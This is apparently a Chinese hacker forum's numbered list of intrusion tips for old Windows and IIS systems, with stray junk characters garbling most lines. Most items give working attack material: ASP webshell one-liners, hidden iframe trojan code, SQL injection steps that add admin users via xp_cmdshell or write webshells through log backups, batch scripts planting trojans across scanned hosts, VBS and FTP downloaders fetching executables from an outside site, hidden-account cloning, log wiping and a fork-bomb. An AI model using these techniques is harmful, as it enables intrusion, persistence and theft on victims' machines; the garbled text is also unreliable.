1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 `3 R0 }- g3 ]. y# {8 _# zcacls C:\windows\system32 /G hqw20:R
% ~7 C8 U. P& u思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
) m8 a/ j1 G8 `7 c/ m5 W恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F) x) u2 H+ v; A$ [1 W$ O, f8 G: R
+ R# Z/ X. t7 y& R2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: M# { `3 u/ T' m
& N R: R. V( p$ a1 D3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。( e o+ L: s4 n
' V1 k/ B3 K# p# A( W
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' `( r0 b2 A F. ~! r
7 n3 Y" V8 z) h. l9 j5、利用INF文件来修改注册表
7 i. X2 g+ ^9 }: b, P4 f[Version]1 d$ H# `3 j5 Z6 h
Signature="$CHICAGO$"0 Q! a* G& r' b7 x8 L
[Defaultinstall]
7 _, p; j" X; h( ^1 }addREG=Ating6 ^) e$ [7 {) ]0 p6 x* D+ o
[Ating], h+ ^9 k2 G9 m# l& v) ?+ M5 q
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
" d- G. j! x. Q& L, G以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
' A- u! B2 N, J0 qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径' T% ?5 G- K( }( q* f# P' t1 U
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU @+ d9 C% ?8 g: L+ ` A! e+ a
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
- D9 G# G4 A z. U i, T% |HKEY_CURRENT_CONFIG 简写为 HKCC D5 S8 ^( c5 f/ `- z
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值# _" K$ Z& C( B$ j0 k* S2 {- E
"1"这里代表是写入或删除注册表键值中的具体数据
% v- m8 k: N% f* L. `5 J- `% I0 ^' [8 k$ {8 W" Z F
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,7 ^# B* ^5 \/ V4 h- x
多了一步就是在防火墙里添加个端口,然后导出其键值
: E# W# z; q C$ m) ~[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# `& ~$ ~( e8 u* Q' R+ H
) D: n, }& r" c, [9 T; |7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ o( _6 d5 r7 w- N! x. ]3 R
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
B) P3 G1 g/ O$ Y' Y* P# b/ Q3 [3 {& D5 I: E( x7 q
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。 A5 Q v) A, B4 U
6 F. t! U2 V7 ]* ]1 F
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
/ D% \# l2 q4 t8 B可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。3 ~4 A$ b6 C! g' f) v' M4 U% E, i
. w% Y+ g! b, o$ x8 t% M7 c8 g9 ^
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
$ e9 _. J" J) o4 a5 X$ q1 o3 Y$ l9 [( f8 }0 R- T
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,) I' D. V( Q7 V4 e) E
用法:xsniff –pass –hide –log pass.txt, `2 M& a: s3 C/ A; Q& x
; q/ l: W5 r1 }4 l12、google搜索的艺术/ O6 Y6 |6 Y5 S6 J) J% ? d
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”) e% [3 W/ x1 X; N
或“字符串的语法错误”可以找到很多sql注入漏洞。/ P: ?. H9 W$ J, p: w; ?+ p8 u
- u3 c& e/ g. U; O
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。" i/ i# l2 w- j& H( z* Y5 u
% V# W/ }6 ~9 S6 H9 y7 N14、cmd中输入 nc –vv –l –p 1987
7 c8 u ^$ ?+ S& E做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃/ V( y c7 R( U1 c7 @2 ~; i
) L% f. ~3 L- U/ N$ [7 \
15、制作T++木马,先写个ating.hta文件,内容为
7 K5 ^- G# C5 t9 p& l/ V<script language="VBScript">, P6 i2 s# ?/ D2 ~
set wshshell=createobject ("wscript.shell" )3 _# c; d7 B) d. ^ S& C) ?( A) m
a=wshshell.run("你马的名称",1)9 ]3 b$ E/ q1 s2 ?$ {
window.close N4 d1 q. H! H7 `8 A
</script>
0 a; w9 h' `6 V, I2 `再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 ~! [0 b2 E% T; X: n# n/ |& q6 H
" t- k# X) A% Y" ~
16、搜索栏里输入) D1 s0 w. w$ _( ^; k+ f
关键字%'and 1=1 and '%'=' Q+ l3 d- M3 M* z# D: Y
关键字%'and 1=2 and '%'='6 N! g4 x" W1 {! j( `
比较不同处 可以作为注入的特征字符
8 r; r9 r- m! F# S; n: h) `. ~9 N6 I9 w! q
17、挂马代码<html>! B, @: n$ k. Q( |/ I
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
% K* O* K8 V" z/ _+ _# F</html>! |+ K, u" |: }( [8 w% {
P7 J* n2 r& s0 m3 Y( \& h% w
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
, V) D ^: q2 Lnet localgroup administrators还是可以看出Guest是管理员来。
: A: t3 s1 C) b) F2 s; o) B6 w
+ r# X. |3 S) K1 m% ]19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
n C& h. U$ \1 l% e用法: 安装: instsrv.exe 服务名称 路径
; H' P9 g+ J' V# q4 a7 {9 s卸载: instsrv.exe 服务名称 REMOVE1 C% Q, B& s b& x2 W5 |, l/ e8 C
" n& Q4 G6 N# P: ]! e+ m1 E
4 l* Z- s, h; \3 K# o Z21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
! C2 b+ w3 S- p不能注入时要第一时间想到%5c暴库。
* s6 Z. J' [9 K$ T; H+ [, J+ i" L/ R. f* [2 K- N
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. d3 j6 {7 U9 d, w7 e- d" [3 d0 W4 H8 s' P4 B# @$ u# T
23、缺少xp_cmdshell时
; X5 n0 n! K3 A0 [# b尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
B. Y+ T: a2 }3 F. H假如恢复不成功,可以尝试直接加用户(针对开3389的)2 A; I% q9 I: ]6 y
declare @o int
4 W1 o' v( a* F" j1 \6 Dexec sp_oacreate 'wscript.shell',@o out
" p- P1 `. O' g# ]( e8 ^exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员6 D5 |' D y) ]1 }: a
0 z; g+ g0 s( R( F9 L! y24.批量种植木马.bat
( F9 T* r5 p+ _ |1 J, ^for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
1 M8 R" J& M# c6 b) x! nfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
1 [9 ?* k0 T6 M8 D* t' C/ p扫描地址.txt里每个主机名一行 用\\开头: Q1 q. i7 q( y; [" |
8 r: d% [# c$ ?4 Y _: b
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。7 {1 w! A5 W' X" T7 n' b, w
" R' V# H5 ?, z& h1 b' M26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
7 E3 M3 j) f, {" }将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.- e' C$ |9 g9 O& n8 P* e* K a
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马# ?( u# S( S4 j$ t
1 `3 P, }2 x, ]' T; I( E, Z27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
: }) v$ T. c' z0 v( w) Z4 c0 F然后用#clear logg和#clear line vty *删除日志
) P" ?8 u i5 H
8 K) o0 X: a4 S& E3 Y, {28、电脑坏了省去重新安装系统的方法5 D+ s! t: e2 Y. R- z# C
纯dos下执行,+ s+ b- _0 B. w+ ~4 D4 X) K
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, @" o5 G/ ?" M# e% C' `+ A: O; t: I- g
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 o& Z* {0 A) Z' Q2 F. U2 z& o9 S# ?' e+ |: A: f: i: b7 ^6 P
29、解决TCP/IP筛选 在注册表里有三处,分别是:
; B) V. @3 i" |HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" J; k0 l: k1 o- U' h
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: ~8 }' y3 x% sHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; |; e, w: D {7 k; G1 _
分别用
/ c/ `) ~( d* }! ~regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 |* x) }* A, L& Z- c2 \regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" H U4 ~7 v" `regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 W* H, `2 B. ^+ z( p命令来导出注册表项
6 h7 Y W K# R, p& D6 ~, d6 K然后把三个文件里的EnableSecurityFilters"=dword:00000001,
% X: X! x( h( o9 Y改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
- j' C2 K$ t* }) C, r- J- fregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。6 K( |; B9 N! f
+ g* P. E; k# `9 Y, ^" p) W) f30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
4 n$ I7 p; f: N& ]# v6 j8 L& QSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3, z6 |; ~! V( S E) o$ ~2 J5 H
+ c7 o, L% c4 d- u3 {: g* {
31、全手工打造开3389工具
3 m, b0 j4 q. R) [打开记事本,编辑内容如下:
2 b1 c, @9 y8 aecho [Components] > c:\sql+ n8 e" p. G+ h4 a( [& D! ?' g
echo TSEnable = on >> c:\sql
3 |- M$ F. N0 w5 i% j) {1 p" Dsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
: A/ V! ?, K7 s1 E# W编辑好后存为BAT文件,上传至肉鸡,执行
) ~- ^5 j0 N( g& k# `; w# _. U+ c. ?0 y8 l Q' c! a
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马) W f0 h& ~2 c8 e8 E& U r
3 T8 W: C# j4 }# f( @
33、让服务器重启7 Y5 }, r! U4 V0 M
写个bat死循环:
e) O& W" O3 j- N3 r1 U@echo off: j+ I3 t( b! @7 i1 ]* N# _, ]
:loop1, A/ U# A, Q9 [, A! ~: @9 f
cls3 c/ y7 T5 y% s" K: z
start cmd.exe3 q' f, H- v0 V4 x
goto loop1! j* y' S5 L3 y' Z0 n/ N
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
$ n& F: T' k; }/ Y5 y4 N
+ C" Z! f% E$ c, x# h34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
# M* c7 ^3 |9 r; n@echo off
+ B. t0 g% I& q0 Adate /t >c:/3389.txt
- h/ ~5 J" d, ?# F7 mtime /t >>c:/3389.txt
! {/ J. i! L4 S- Gattrib +s +h c:/3389.bat
( T" E+ _9 S/ i4 e" b7 uattrib +s +h c:/3389.txt
% B; }' J: C) ?, j5 rnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
1 V7 Y% R6 K: ^' g! r/ ?; {并保存为3389.bat. `) {. }5 m& Z* _% d% p4 e5 C6 [
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号2 n) A/ k3 c& b
. ]% p, A7 D. [- `. [! p
35、有时候提不了权限的话,试试这个命令,在命令行里输入:0 |: o, {7 v6 o/ q
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页). u7 X7 z9 r7 P# x- N5 \( \/ t
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
" P$ C) A$ G" [* H$ w9 q! f0 k+ `2 M) f9 y
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
2 S% o6 b6 ^/ X# lecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
% R+ z z2 Y+ p# w( becho 你的FTP账号 >>c:\1.bat //输入账号, ]4 ?- Y) D/ w; j
echo 你的FTP密码 >>c:\1.bat //输入密码: ^ p6 S5 k( r1 C! I4 a
echo bin >>c:\1.bat //登入9 q" }2 P1 Z; a$ l4 _4 W0 d
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
! I$ H# e( P; i6 p; X9 cecho bye >>c:\1.bat //退出1 W" r; \- h Z7 e/ g
然后执行ftp -s:c:\1.bat即可; Q* a9 Z% K7 Y$ o
+ x8 h7 ^+ r H37、修改注册表开3389两法5 ~& }+ h4 m) B
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表. Q' Y* v6 n0 T) Z' @" R
echo Windows Registry Editor Version 5.00 >>3389.reg7 e: `8 U# I$ s6 {3 Y! h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
6 v7 U. i3 u# R0 n7 E* N9 \$ O; Hecho "Enabled"="0" >>3389.reg- q- o2 E$ t* Z5 V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 y, [% V! l9 Z1 s3 r
NT\CurrentVersion\Winlogon] >>3389.reg
# {* B: W1 `' @& H: Secho "ShutdownWithoutLogon"="0" >>3389.reg
8 t( ?, K: K6 E6 Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
, t' h( M& t0 s2 Y9 N* j>>3389.reg1 K# c* I" o$ x1 U) q8 `
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
' Z( e0 Q( K& O" y# v% jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+ |1 i1 Q' y3 ]# J3 ?>>3389.reg
9 R, F4 O) E6 B% p% y9 ~1 decho "TSEnabled"=dword:00000001 >>3389.reg6 R6 N! h" T4 ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg* y! f O! n6 X8 ^% Z1 r
echo "Start"=dword:00000002 >>3389.reg" X" k, {( g# H7 j! _! g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
, c' {: w* ~4 o8 Z. z; r3 s8 l>>3389.reg! F! H) {2 G8 |( K* C, H
echo "Start"=dword:00000002 >>3389.reg
/ c/ K" H. |- `; a, Y; L0 ?" Qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg) f1 k, S' e( Y' M8 ^8 R5 [0 L
echo "Hotkey"="1" >>3389.reg
8 }* C5 Q4 z' r* [: Y, C7 w6 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& t0 B* B" d+ x* k
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
$ ^$ O2 a, Q# T x; uecho "PortNumber"=dword:00000D3D >>3389.reg. `6 i: ^0 c, U L! R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 D( _& m. p* `& w9 R' d/ t' b) m; U
Server\WinStations\RDP-Tcp] >>3389.reg
% r: G2 K' x5 Y: H" ~& _echo "PortNumber"=dword:00000D3D >>3389.reg3 x/ Z1 i( ~! k( `: B* [- l% v+ r
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
$ V: w6 X3 [. N0 n(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
' J! U/ v" T! U因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
; @# m% E6 t7 n, h$ F0 H(2)winxp和win2003终端开启# N3 N# } `7 \" [% g: `
用以下ECHO代码写一个REG文件:0 h1 y5 f5 I0 {+ }5 H
echo Windows Registry Editor Version 5.00>>3389.reg
3 f; u0 r8 b" [4 D( ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. k* s: P, @( `Server]>>3389.reg
" p1 s% L- e7 Becho "fDenyTSConnections"=dword:00000000>>3389.reg
) y0 M( c8 F+ q" X( v* F: I1 Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 g) n2 X" g7 B9 C2 r8 x
Server\Wds\rdpwd\Tds\tcp]>>3389.reg0 c" B- i6 z8 J6 X3 U" T4 H6 ]
echo "PortNumber"=dword:00000d3d>>3389.reg9 b: v# j$ Z# W# P! G7 Y# \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' K! |2 l0 w! e0 @! _4 B5 KServer\WinStations\RDP-Tcp]>>3389.reg
- }$ \# v$ e. Q5 Secho "PortNumber"=dword:00000d3d>>3389.reg9 N0 u' D# t3 A
然后regedit /s 3389.reg del 3389.reg
+ U& [. ?' g0 o7 r! BXP下不论开终端还是改终端端口都不需重启
3 s1 z+ ~' L5 f$ Q; p, {& B6 e9 s3 A% O, F$ U6 ?
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃& B2 [/ O$ I1 C1 P; E3 x6 c
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
1 S' Q9 `0 o- N- e0 Y' G% G
& C, k1 f: K$ R) F39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!/ A, a, l4 _" U b
(1)数据库文件名应复杂并要有特殊字符. S" ~" p. e, I$ c( o! b$ ~
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
' ~+ C/ |# v; Q5 b将conn.asp文档中的+ ?: u# _6 V) |( L5 h1 k+ Y
DBPath = Server.MapPath("数据库.mdb")
7 E. B9 h* r6 ]) {conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
+ O: E; J$ q0 `3 h
! S3 _0 `' Q5 i' q修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
% A$ ^- i- W# w% u" D7 ~(3)不放在WEB目录里
" O: C/ y' E \+ \8 q% w) L7 u/ Y1 M+ H8 i. W$ i6 o% [
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 Q- u9 d0 t+ N: g! }" A. D, B: D
可以写两个bat文件
9 C8 d7 p; {. v+ K7 w) c@echo off8 F. E' U0 E7 \# D2 ?
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! I9 S' s8 f6 Q6 V3 i; }@del c:\winnt\system32\query.exe
$ n) r7 c+ l, W/ {! f- _( y$ }@del %SYSTEMROOT%\system32\dllcache\query.exe
% w5 W3 ^1 p& c O. B@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
$ B/ x3 ]2 a% Q1 p/ L2 l1 B4 O8 F& l3 ~) g; }: v
@echo off
" E h: P/ N# c ~9 ^@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe# O! n' a2 @+ n& @; _
@del c:\winnt\system32\tsadmin.exe( z6 h9 K3 ] o9 r
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex7 [ J3 c- F: ~2 l* O# }& T0 [! ^1 s3 `
" F, q( n' h, v1 d& x
41、映射对方盘符0 ^$ Y! q% g# X+ v! ?$ g6 s( C9 \
telnet到他的机器上,
+ G0 f" V7 k7 V' W! a3 Rnet share 查看有没有默认共享 如果没有,那么就接着运行2 ?" E* Q' A: B- }+ `- b( \4 o( u
net share c$=c:' r! D# H) V. f3 |: p
net share现在有c$
+ a: j( \$ }: U$ E: [- T在自己的机器上运行' f, T0 s! V$ O! m1 Q- }# D# k
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K' u9 q4 @, P7 ]( N- M: g$ r" l6 d
# L" g7 |1 [" I2 i$ [5 ?& E3 S; ?8 G0 s
42、一些很有用的老知识
& X0 ~0 j3 ]8 _6 E! h: Q' Jtype c:\boot.ini ( 查看系统版本 )% q% X& x7 S5 J v* z# I- Q
net start (查看已经启动的服务)! n. c$ ?: G/ F+ i
query user ( 查看当前终端连接 ); q6 u; s2 }$ B" J& C
net user ( 查看当前用户 )' q G- n! a) X& Q. G
net user 用户 密码/add ( 建立账号 )
- M2 @+ T+ O. w/ M" q6 W1 _net localgroup administrators 用户 /add (提升某用户为管理员)$ M9 `& X' W% J6 w- Q/ t
ipconfig -all ( 查看IP什么的 )3 @5 y, Q% f8 M% @& q
netstat -an ( 查看当前网络状态 )& {1 m" @, \( U: ~
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
3 B% ~! E \2 }0 b% n克隆时Administrator对应1F4
$ [$ y" r, R1 G! [8 D1 Xguest对应1F55 V$ u2 G: \$ B! H! N
tsinternetuser对应3E8
& x9 V9 E; z% w0 C6 w8 X6 v; W8 N% I* h. @4 |2 `* C
43、如果对方没开3389,但是装了Remote Administrator Service$ W/ m. I+ k* @4 w2 X
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接* c- h9 X% x- M
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息4 R$ n3 t( I5 M c* |
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"1 L0 Y5 q3 q: @: s* K0 {( G! q
% G% m8 j% S# h# N4 W1 x
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定). a0 V( a: k6 v4 o4 M
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
; v4 Q: b- E( K( p6 N3 \) M5 P
* G- s5 F# H# r( a2 l45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
{$ l6 N7 C: ^* x9 E/ Secho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
9 a1 e$ Z# Q, _- J& d. `- `^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =$ R- w$ l: s% Y& O
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =6 C9 Z7 a- P4 o7 J/ z1 q
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs* F! Z* r9 i) j" t5 q5 b$ G
(这是完整的一句话,其中没有换行符)
& C( g. |. a6 J然后下载: Y# f4 h! N: C9 X" o4 v7 d
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
3 J+ z# j' W3 v, R# T9 x) B) G. Z( W) O4 ~( W
46、一句话木马成功依赖于两个条件:
* {2 n7 }$ Y' G$ y) u: S+ O1、服务端没有禁止adodb.Stream或FSO组件
$ L% ]! t: ^. _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
2 L3 Z- l% M7 p) H
( |5 x, K% r; f' k. v47、利用DB_OWNER权限进行手工备份一句话木马的代码:
5 Q: {9 s4 y- v* b9 N;alter database utsz set RECOVERY FULL--
+ m- L" n3 h% R. j' t' l; x1 r;create table cmd (a image)--
1 m' [6 l7 j1 \;backup log utsz to disk = 'D:\cmd' with init--
9 R& S4 P3 V; H, z- C" F;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--+ \. c- C5 {- Q' b
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--$ m) o& s' ?: ~* f' X: O. F
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。0 L! f0 c T: e' z. @
2 d% b( r: n: f4 X' \( @* U' H48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 T7 p6 r2 c% y# N. X& n2 @" v
& b3 t# T6 K- o0 {" `" Q/ L
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
& n6 X/ u6 [4 c( W4 r所有会话用 'all'。% [. m/ N" u) V% f# o
-s sessionid 列出会话的信息。+ `+ b! v0 v6 c; ^3 T; m7 A$ }3 z; A! V
-k sessionid 终止会话。) P4 J# {: p V1 f( f; r* U
-m sessionid 发送消息到会话。: v0 G: o0 P" i0 `! n( k2 m& K
. P z: ?3 P0 J1 m3 ~
config 配置 telnet 服务器参数。
" ^( Q) A5 n! {* @2 a/ J) p7 B7 K# o, G) ]- q. S0 @2 s& s
common_options 为:/ O- {& x' ~; z. u* ~5 p
-u user 指定要使用其凭据的用户9 k5 Y, y* q% G6 J r" r3 Y
-p password 用户密码+ |% P* i1 d' ~8 a* }0 j& M
- B H( P' }- ?. z0 e
config_options 为:
$ z) M8 S; J8 Z0 S/ I8 udom = domain 设定用户的默认域
9 O3 s- G) v6 q4 C- n0 Yctrlakeymap = yes|no 设定 ALT 键的映射
: x E* K+ l6 Vtimeout = hh:mm:ss 设定空闲会话超时值' ^3 ?+ l- d% y0 D7 T
timeoutactive = yes|no 启用空闲会话。8 l; {( S; H8 Y$ Q# A( O
maxfail = attempts 设定断开前失败的登录企图数。. w) m |: c* J M$ `. e
maxconn = connections 设定最大连接数。
) ]. a. P, Z# L; r5 R' _# |port = number 设定 telnet 端口。7 j, X, j, O5 R* p
sec = [+/-]NTLM [+/-]passwd8 ]3 d ^- r9 ]
设定身份验证机构 g" n3 s2 Y+ Y' g
fname = file 指定审计文件名。
% U6 l8 i9 W& f6 A5 r5 ~6 B. ]fsize = size 指定审计文件的最大尺寸(MB)。
% o4 \& L9 h j2 i0 y7 hmode = console|stream 指定操作模式。
4 K- F0 V5 ~5 J5 N1 Sauditlocation = eventlog|file|both' ^# @! B' ~! r( @2 O
指定记录地点
3 r# f) J, P, B) P8 U( eaudit = [+/-]user [+/-]fail [+/-]admin! j% n: s! h! r3 B
* ^% J0 Q5 U. I9 ~
49、例如:在IE上访问:
8 j9 D* W0 ^7 ?3 J. S+ gwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/( R0 i. D( z; t- s+ f
hack.txt里面的代码是:- `- M/ h2 ^, O
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">9 h8 A8 m \) Z% ? D! |
把这个hack.txt发到你空间就可以了!& Z* b0 A; w2 U% r' v
这个可以利用来做网马哦!
2 d7 b* G1 Z' o* b( E1 A; j. |: [) w
50、autorun的病毒可以通过手动限制!
2 H8 h& ]# q, Q: c% F/ ]# e1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
7 d" B/ G$ M9 \% s1 d+ U ]2,打开盘符用右键打开!切忌双击盘符~8 ^+ \$ z5 p, k& l. \" Q' x
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
" \7 U0 U% _7 {0 ^. q0 Q5 A: ~ c
4 @" i" E$ s2 o" u; u51、log备份时的一句话木马:
1 f* [2 v( H2 t) W$ la).<%%25Execute(request("go"))%%25>$ `5 h- g$ C3 m6 E C' b' O
b).<%Execute(request("go"))%>
/ M+ t( k3 k( Dc).%><%execute request("go")%><%
5 e. T0 U" i3 Cd).<script language=VBScript runat=server>execute request("sb")</Script>
5 {. n, l+ \+ `/ E& Me).<%25Execute(request("l"))%25>
8 O# B- }2 G, N% F. H, hf).<%if request("cmd")<>"" then execute request("pass")%>
5 _0 Q% L& E2 A9 f0 i5 I& R) A3 I( ~" W4 e6 ^3 i( |$ V
52、at "12:17" /interactive cmd
6 _2 t# M V, d" C3 m* i执行后可以用AT命令查看新加的任务8 l& _6 r& X& B5 A/ I a! M
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) T( C7 |/ y m$ g8 [: X
